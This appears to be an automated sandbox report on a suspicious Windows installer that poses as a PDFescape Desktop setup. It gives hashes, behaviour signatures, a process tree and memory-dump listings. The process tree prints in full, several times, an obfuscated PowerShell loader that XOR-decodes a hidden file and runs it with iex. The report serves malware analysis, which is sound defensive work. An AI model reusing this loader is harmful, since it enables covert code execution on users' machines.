Overview

overview

8

Static

static

aa5ba0f6ce...9d.exe

windows7_x64

8

aa5ba0f6ce...9d.exe

windows10_x64

8

Resubmissions

16-03-2021 18:01

210316-trddssyj5s 10

16-03-2021 17:35

210316-s74c3lhrtn 8

Analysis

  • max time kernel
    146s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    16-03-2021 17:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe

  • Size

    117.6MB

  • MD5

    015fd4bc87666d454f1517b2970dc097

  • SHA1

    88685aaaba4297deef30ac4fe9bd065baa7c0c0d

  • SHA256

    aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d

  • SHA512

    ed3378510720b92fa77098c4d48763ea04e52c63bbbf074b711e16ef781281314dad6a7e0d3069bf0cd7598c1ea426b6effabd691ae0a945e79144afdd153637

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 10 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe
    "C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4776
    • C:\Users\Admin\AppData\Local\Temp\is-NJV28.tmp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-NJV28.tmp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp" /SL5="$20128,122284744,999424,C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3624
      • C:\Users\Admin\AppData\Local\Temp\is-N5VCV.tmp\PDFescape_Desktop_Installer.exe
        "C:\Users\Admin\AppData\Local\Temp\is-N5VCV.tmp\PDFescape_Desktop_Installer.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3208
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:3300
        • C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
          "C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer
          4⤵
          • Executes dropped EXE
          • Modifies registry class
          PID:644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4052
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4032
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1996
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4520
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4540
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4564
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2428
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2588
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:212
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2456
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}
    1⤵
    • Loads dropped DLL
    PID:1012

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/212-70-0x00000000049A0000-0x00000000049A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/212-213-0x00000000049A3000-0x00000000049A4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/212-74-0x00000000049A2000-0x00000000049A3000-memory.dmp

    Filesize

    4KB

    Download

  • memory/212-62-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1996-122-0x0000000008800000-0x0000000008801000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1996-202-0x0000000004E43000-0x0000000004E44000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1996-28-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1996-31-0x0000000006EA0000-0x0000000006EA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1996-50-0x0000000004E40000-0x0000000004E41000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1996-75-0x0000000004E42000-0x0000000004E43000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2428-212-0x0000000004E33000-0x0000000004E34000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2428-48-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2428-55-0x0000000004E30000-0x0000000004E31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2428-61-0x0000000004E32000-0x0000000004E33000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2456-52-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2456-65-0x0000000006F02000-0x0000000006F03000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2456-60-0x0000000006F00000-0x0000000006F01000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2456-214-0x0000000006F03000-0x0000000006F04000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2588-66-0x0000000004EA0000-0x0000000004EA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2588-69-0x0000000004EA2000-0x0000000004EA3000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2588-59-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2588-211-0x0000000004EA3000-0x0000000004EA4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3624-7-0x0000000003611000-0x0000000003615000-memory.dmp

    Filesize

    16KB

    Download

  • memory/3624-8-0x0000000000810000-0x0000000000811000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-152-0x00000000088C0000-0x00000000088C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-86-0x0000000007430000-0x0000000007431000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-72-0x00000000064E2000-0x00000000064E3000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-83-0x00000000072A0000-0x00000000072A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-81-0x00000000071C0000-0x00000000071C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-151-0x0000000008960000-0x0000000008961000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-80-0x0000000006A00000-0x0000000006A01000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-56-0x00000000064E0000-0x00000000064E1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-161-0x0000000008F00000-0x0000000008F01000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-199-0x00000000064E3000-0x00000000064E4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-128-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-120-0x0000000007250000-0x0000000007251000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-154-0x0000000008910000-0x0000000008911000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4032-27-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/4052-46-0x0000000006510000-0x0000000006511000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4052-232-0x0000000008F40000-0x0000000008F58000-memory.dmp

    Filesize

    96KB

    Download

  • memory/4052-36-0x0000000006B50000-0x0000000006B51000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4052-71-0x0000000006512000-0x0000000006513000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4052-195-0x0000000009D90000-0x0000000009D91000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4052-26-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/4052-196-0x0000000006513000-0x0000000006514000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4520-210-0x0000000006963000-0x0000000006964000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4520-78-0x0000000006962000-0x0000000006963000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4520-33-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/4520-76-0x0000000006960000-0x0000000006961000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4540-77-0x0000000006A00000-0x0000000006A01000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4540-37-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/4540-200-0x0000000006A03000-0x0000000006A04000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4540-79-0x0000000006A02000-0x0000000006A03000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4564-43-0x0000000070C80000-0x000000007136E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/4564-49-0x0000000004770000-0x0000000004771000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4564-209-0x0000000004773000-0x0000000004774000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4564-54-0x0000000004772000-0x0000000004773000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4776-4-0x0000000000401000-0x00000000004B7000-memory.dmp

    Filesize

    728KB

    Download